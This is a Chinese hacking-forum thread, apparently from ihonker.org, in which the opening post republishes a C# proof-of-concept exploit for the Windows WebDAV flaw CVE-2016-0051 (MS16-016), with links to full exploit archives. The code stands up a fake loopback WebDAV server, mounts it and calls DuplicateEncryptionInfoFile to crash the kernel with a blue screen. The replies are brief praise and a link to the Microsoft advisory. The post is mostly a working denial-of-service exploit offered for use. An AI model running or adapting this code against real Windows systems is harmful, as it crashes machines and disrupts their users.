查看: 88522|回复: 1944

MS16-016 Exploit

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-2-11 20:08:31 | 显示全部楼层 |阅读模式
    Microsoft Windows WebDAV - BSoD PoC (MS16-016) Exploit

    Source: https://github.com/koczkatamas/CVE-2016-0051


    [HTML] 纯文本查看 复制代码
    /*
      
    Source: [url]https://github.com/koczkatamas/CVE-2016-0051[/url]
      
    Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016).
      
    Full Proof of Concept:
    [url]https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip[/url]
    [url]https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432.zip[/url]
      
    */
      
    using System;
    using System.IO;
    using System.Linq;
    using System.Net;
    using System.Net.Sockets;
    using System.Runtime.InteropServices;
    using System.Text;
    using System.Threading;
      
    namespace BSoD
    {
        class Program
        {
            static void StartFakeWebDavServer(int port)
            {
                new Thread(() =>
                {
                    var server = new TcpListener(IPAddress.Loopback, port);
                    server.Start();
                    while (true)
                    {
                        using (var client = server.AcceptTcpClient())
                        using (var stream = client.GetStream())
                        using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1")))
                        using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true })
                        {
                            Console.WriteLine(" =============== BEGIN REQUEST =============== ");
      
                            Func<string> rl = () =>
                            {
                                var line = reader.ReadLine();
                                Console.WriteLine("< " + line);
                                return line;
                            };
      
                            Action<string> wl = outData =>
                            {
                                Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x)));
                                writer.Write(outData);
                            };
      
                            var header = rl().Split(' ');
                            while (!string.IsNullOrWhiteSpace(rl())) { }
      
                            if (header[0] == "OPTIONS")
                                wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n");
                            else if (header[0] == "PROPFIND")
                            {
                                var body = String.Format(@"
    <?xml version=""1.0"" encoding=""UTF-8""?>
    <D:multistatus xmlns:D=""DAV:"">
    <D:response>
        <D:href>{0}</D:href>
        <D:propstat>
            <D:prop>
                <D:creationdate>{1:s}Z</D:creationdate>
                <D:getcontentlength>{3}</D:getcontentlength>
                <D:getcontenttype>{4}</D:getcontenttype>
                <D:getetag>{5}</D:getetag>
                <D:getlastmodified>{6:R}</D:getlastmodified>
                <D:resourcetype>{8}</D:resourcetype>
                <D:supportedlock></D:supportedlock>
                <D:ishidden>{7}</D:ishidden>
            </D:prop>
            <D:status>HTTP/1.1 200 OK</D:status>
        </D:propstat>
    </D:response>
    </D:multistatus>", header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "", DateTime.UtcNow.ToUniversalTime(), 0, header[1].Contains("file") ? "" : "<D:collection></D:collection>").Trim();
      
                                wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body);
                            }
                            else
                                wl("HTTP/1.1 500 Internal Server Error\r\n\r\n");
      
                            Console.WriteLine(" =============== END REQUEST =============== ");
                        }
                    }
                }) { IsBackground = true, Name = "WebDAV server thread" }.Start();
            }
      
            [StructLayout(LayoutKind.Sequential)]
            private class NETRESOURCE
            {
                public uint dwScope = 0;
                public uint dwType = 0;
                public uint dwDisplayType = 0;
                public uint dwUsage = 0;
                public string lpLocalName = null;
                public string lpRemoteName = null;
                public string lpComment = null;
                public string lpProvider = null;
            }
      
            [DllImport("mpr.dll")]
            private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags);
      
            [DllImport("Advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern int DuplicateEncryptionInfoFile(string srcFileName, string dstFileName, uint dwCreationDistribution, uint dwAttributes, IntPtr lpSecurityAttributes);
      
            public static void Main(string[] args)
            {
                var p = new Random().Next(1024, 65535);
      
                StartFakeWebDavServer(p);
      
                var addConnectionResult = WNetAddConnection2(new NETRESOURCE() { lpRemoteName = @"\\127.0.0.1@" + p + @"\folder\" }, null, null, 0);
                Console.WriteLine("WNetAddConnection2 = " + addConnectionResult);
      
                var duplicateEncryptionInfoResult = DuplicateEncryptionInfoFile(@"\\127.0.0.1@" + p + @"\folder\file", "x", 2, 128, IntPtr.Zero);
                Console.WriteLine("DuplicateEncryptionInfoFile = " + duplicateEncryptionInfoResult);
      
                Console.WriteLine("BSoD did not happen.");
                Console.ReadLine();
            }
        }
    }
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2018-11-26 14:17
  • 签到天数: 77 天

    [LV.6]常住居民II

    发表于 2016-2-12 09:40:33 | 显示全部楼层
    put 漏洞?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2016-2-12 15:59:28 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-4-11 10:25
  • 签到天数: 55 天

    [LV.5]常住居民I

    发表于 2016-2-12 18:41:49 | 显示全部楼层
    https://technet.microsoft.com/zh-cn/library/security/ms16-016
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-2-12 23:16:15 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-2-13 04:21:16 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2016-2-13 20:54:38 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-2-14 00:26:58 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-2-14 16:32:53 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-2-15 00:47:54 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 00:44 , Processed in 0.030195 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部